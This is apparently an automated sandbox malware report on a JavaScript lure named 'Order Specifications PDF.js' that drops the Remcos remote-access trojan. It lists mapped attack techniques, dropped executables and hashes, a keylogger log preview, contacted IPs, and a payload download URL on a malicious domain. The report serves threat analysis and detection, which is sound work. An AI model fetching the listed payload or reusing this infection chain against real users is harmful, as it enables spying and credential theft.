Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	42 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	111 Input Capture	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	12 Registry Run Keys / Startup Folder	412 Process Injection	42 Scripting	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	111 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	3 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	113 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	412 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Order Specifications PDF.js	27%	ReversingLabs	Script-JS.Trojan.Remcos
Order Specifications PDF.js	25%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Woreflint
C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Woreflint
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Woreflint

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
13.0.RegSvcs.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen		Download File
10.0.VNZVNCXKKJSF.exe.540000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
tgc8x.tk	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo	100%	Avira URL Cloud	phishing
https://tgc8x.tk/tt/VNZVNCXKKJSF.exe	100%	Avira URL Cloud	malware
https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g	100%	Avira URL Cloud	phishing
https://tgc8x.tk/tt/VNZVNCXKKJSF.exe	13%	Virustotal		Browse
https://go.micros	0%	Avira URL Cloud	safe
51.75.209.245	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tgc8x.tk	50.115.174.192	true	true	6%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tgc8x.tk/tt/VNZVNCXKKJSF.exe	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
51.75.209.245	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo	wscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://sectigo.com/CPS0	Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	false	URL Reputation: safe	unknown
https://go.micros	powershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://geoplugin.net/json.gp/C	VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g	wscript.exe, 00000000.00000003.330576085.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271757510.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263690422.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268366678.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256906649.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.255312802.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254064481.0000018AB4B6C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250150561.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.331377637.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.309049295.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264679771.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332128622.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250282440.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.308651780.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332656131.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250225824.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.336031702.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://contoso.com/License	powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.115.174.192	tgc8x.tk	United States		32875	VIRPUS	true
51.75.209.245	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	737570
Start date and time:	2022-11-03 23:34:01 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order Specifications PDF.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2
EGA Information:	Successful, ratio: 50%
HDC Information:	Failed
HCA Information:	Successful, ratio: 96% Number of executed functions: 158 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 480 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5224 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:36:00	API Interceptor	1x Sleep call for process: VNZVNCXKKJSF.exe modified
23:37:21	API Interceptor	42x Sleep call for process: powershell.exe modified
23:37:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
23:37:59	API Interceptor	1x Sleep call for process: Systedbddfm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
50.115.174.192	RFQ.exe	Get hash	malicious	Browse
	RFQ- PO90064765002293.exe	Get hash	malicious	Browse
	output(3).js	Get hash	malicious	Browse
	PO_1276445.js	Get hash	malicious	Browse
	Purchase inquiry .js	Get hash	malicious	Browse
	StZAEFSb2j.exe	Get hash	malicious	Browse
	U8RYIwIvfK.exe	Get hash	malicious	Browse
	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse
	CnptEaXHK7.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	RFQ# 6000163267.js	Get hash	malicious	Browse
	WY220353098B.js	Get hash	malicious	Browse
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse
	vNrvIu0ujD.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
51.75.209.245	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	DHL SHIPPING DOCUMENTS.js	Get hash	malicious	Browse
	RFQ 01.300.TRGVH.exe	Get hash	malicious	Browse
	TNT Shipping Documents.js	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	NEW ORDER 27.10.2022.exe	Get hash	malicious	Browse
	TNT Shipping Documents.exe	Get hash	malicious	Browse
	PAYMENT COPY.js	Get hash	malicious	Browse
	RFQ No. 01.300.TRGVH.exe	Get hash	malicious	Browse
	PAYMENT COPY.exe	Get hash	malicious	Browse
	Request For Quotation 01.300.TRGVH.exe	Get hash	malicious	Browse
	Request For Quotation 01.300.TRGVH.exe	Get hash	malicious	Browse
	Request For Quotation 01.300.TRGVH.exe	Get hash	malicious	Browse
	TNT Original Invoice.exe	Get hash	malicious	Browse
	NEW PURCHASE ORDER 7A68D20.exe	Get hash	malicious	Browse
	PAYMENT COPY.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tgc8x.tk	RFQ.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ- PO90064765002293.exe	Get hash	malicious	Browse	50.115.174.192
	output(3).js	Get hash	malicious	Browse	50.115.174.192
	PO_1276445.js	Get hash	malicious	Browse	50.115.174.192
	Purchase inquiry .js	Get hash	malicious	Browse	50.115.174.192
	StZAEFSb2j.exe	Get hash	malicious	Browse	50.115.174.192
	U8RYIwIvfK.exe	Get hash	malicious	Browse	50.115.174.192
	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VIRPUS	RFQ.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ- PO90064765002293.exe	Get hash	malicious	Browse	50.115.174.192
	output(3).js	Get hash	malicious	Browse	50.115.174.192
	PO_1276445.js	Get hash	malicious	Browse	50.115.174.192
	Purchase inquiry .js	Get hash	malicious	Browse	50.115.174.192
	StZAEFSb2j.exe	Get hash	malicious	Browse	50.115.174.192
	U8RYIwIvfK.exe	Get hash	malicious	Browse	50.115.174.192
	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Browse	50.115.174.192
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxkb3Aub25lP2U9c3R1YXJ0LnRhaXRAY21zLWNtY2suY29t	Get hash	malicious	Browse	50.115.174.192
	https://soundcheck.com.mx/?ads_click=1&data=14017-14016-14009-13726-1&nonce=fd9790b2d6&redir=https://sedyol.com.tr/q3dendum/recterfyer/#smills@diversityworksnz.org.nz	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	ns), UAE.exe	Get hash	malicious	Browse	50.115.174.192
	http://beeflambnz.com	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	45060285252_Purchase Agr.General Conducts_V2. 2021_ita.vbs	Get hash	malicious	Browse	50.115.174.192
	https://www.evernote.com/shard/s442/sh/3cbc5eb4-4f27-1eca-7d98-4ba7525ba59d/e8a3f04f19a5f7d8ba0b4218a0a04649	Get hash	malicious	Browse	50.115.174.192
	https://rameshsunkoju.com/floe/database.php?loadlog=ok	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	http://622302.622302.envipetro.co.za/#.aHR0cDovL0Rlby5oeWRyb3ZpY3RvcmlhZmlzaGhhdGNoZXJ5ZmFybS5jby5rZS9odG1sI1RrRkVTVTVGTGtOU1FWZEdUMUpFUUdSbGJ5NXRlV1pzYjNKcFpHRXVZMjl0	Get hash	malicious	Browse	50.115.174.192
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9jYXItYWdlLnRvcD9lPVozTmxkR2hwUUdaamNITXVaV1Ix	Get hash	malicious	Browse	50.115.174.192
	ATT.html	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Gen.Variant.Nemesis.13378.6656.371.exe	Get hash	malicious	Browse	50.115.174.192
	Invoice-38937.shtml	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Gen.Variant.Nemesis.13378.20126.6200.exe	Get hash	malicious	Browse	50.115.174.192

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	216
Entropy (8bit):	3.3448102746557975
Encrypted:	false
SSDEEP:	3:rnlSlLl8alFNqlDl5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:0lRjF4b5YcIeeDAlOWAAe5q1gWAv
MD5:	4E985ACC86743F3E1726CB9DAEE285AD
SHA1:	F6BCE911E5AFC3194AEAF4180BF934D45C6B21C5
SHA-256:	2AE29D539D27B0B585AEE9E303F72348C942D84856D38428C4DDFE0D1ABC3CC1
SHA-512:	70A17A221875B019321FA9C534B34D18A987A42C112AD2B86CFF7D6DE7CDBFDC90C172CE7CD7EA5603E045D28E308775A5BD39AD93D68EC117E691C089AF7BCB
Malicious:	true
Preview:	....[.2.0.2.2./.1.1./.0.3. .2.3.:.3.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Systedbddfm.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.347480285514745
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
MD5:	7758BEB381EB8F360E01D8E3C7D2F776
SHA1:	5604F98BBFC87B90608925EC9F71764FA66F7BD7
SHA-256:	8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
SHA-512:	B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VNZVNCXKKJSF.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.347480285514745
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
MD5:	7758BEB381EB8F360E01D8E3C7D2F776
SHA1:	5604F98BBFC87B90608925EC9F71764FA66F7BD7
SHA-256:	8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
